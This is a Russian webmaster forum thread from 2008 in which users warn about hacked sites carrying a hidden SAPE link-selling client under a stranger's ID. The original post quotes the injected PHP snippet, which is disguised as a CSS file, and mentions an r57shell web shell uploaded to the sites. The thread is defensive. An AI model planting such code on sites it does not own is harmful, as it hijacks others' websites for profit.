Форум Сайтостроение Администрирование серверов

Проверьте свои сайты на предмет левых вызовов SAPE

12
Y
На сайте с 02.01.2006
Offline
138
Yukko
1607

Шановна громада. Настоятельно советую прошерстить свои сайты и поискать не свои идентификаторы биржи SAPE.

Я, например, наковырял такое: 2a8270ad9838dde836f8e99976a5b8c1

Код вызова валяется под видом css файла в css/css/css.php

Ни у кого такого или не своего индентификатора не появилось?

Yukko добавил 25.12.2008 в 11:31

Update:

я уже такое на двух своих сайтах откопал... на коих отродясь сапы не было...

Конструкция такая:

if (!defined('_SAPE_USER')){
define('_SAPE_USER', '2a8270ad9838dde836f8e99976a5b8c1');
}
require_once('/path/career.in.ua/image/css/css.php');
$sape = new SAPE_client();

$t->set_var("S_LINKS",$sape->return_links());
AX
На сайте с 20.09.2008
Offline
133
ApocX
#1

Думаю ваши сайты подверглись взлому. И сейчас с них качает денюжку кто-то еще =)

LEOnidUKG
На сайте с 25.11.2006
Offline
1774
LEOnidUKG
#2

Словили трояна, он увёл пароли от фтп и закачал сапу... как всё банально...

✅ Мой Телеграм канал по SEO, оптимизации сайтов и серверов: https://t.me/leonidukgLIVE ✅ Качественное и рабочее размещение SEO статей СНГ и Бурж: https://getmanylinks.ru/ ✅ Настройка и оптимизация серверов https://getmanyspeed.ru/
Y
На сайте с 02.01.2006
Offline
138
Yukko
#3

не надо мне объяснять, что произошло ;) я замечательно понимаю это...

ApocX:
И сейчас с них качает денюжку кто-то еще =)

Не качает. пока код не может поставить, но троян через сайты уже заливает...

RAS
На сайте с 27.11.2005
Offline
126
RAS
#4

А с каким антивирусом поймали троян ? Я собираю статистику.

Администрируем сервера, впс, вдс. Ускоряем загрузку сайтов - DLE, Word Press, Joomla, Modx... Настраиваем безопасность. Ручная чистка rootkit/malware/вирусов. (/ru/forum/867860) Разработка - shell/bash/sh/python/perl.
Y
На сайте с 02.01.2006
Offline
138
Yukko
#5
RAS:
А с каким антивирусом поймали троян ? Я собираю статистику.

у меня стоит AVG, но не факт, что я споймал трояна. С сайтами работают разные люди...

на сайты залиты r57shell 1.40

работа ведется через анонимайзер cproxy.cz

LEOnidUKG
На сайте с 25.11.2006
Offline
1774
LEOnidUKG
#6

Yukko, пишите в сапу, чтобы '2a8270ad9838dde836f8e99976a5b8c1' заблокировали.

Y
На сайте с 02.01.2006
Offline
138
Yukko
#7
LEOnidUKG:
Yukko, пишите в сапу, чтобы '2a8270ad9838dde836f8e99976a5b8c1' заблокировали.

давно уже. еще до момента публикации на форуме :)

dkameleon
На сайте с 09.12.2005
Offline
386
dkameleon
#8
Yukko:
давно уже. еще до момента публикации на форуме

главное чтоб не оказалось, что кто-то так решил конкурента подставить :))

Дизайн интерьера (http://balabukha.com/)
Y
На сайте с 02.01.2006
Offline
138
Yukko
#9
dkameleon:
главное чтоб не оказалось, что кто-то так решил конкурента подставить

Это несложно выявить. Если у человека куча сайтов на эккаунте, по которым хуизы выдают разные емейлы, то это не подстава конкурента ;)

dkameleon
На сайте с 09.12.2005
Offline
386
dkameleon
#10
Yukko:
Это несложно выявить. Если у человека куча сайтов на эккаунте, по которым хуизы выдают разные емейлы, то это не подстава конкурента

так надо, чтоб сапорт это проверил, а не сразу грохнул :)

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий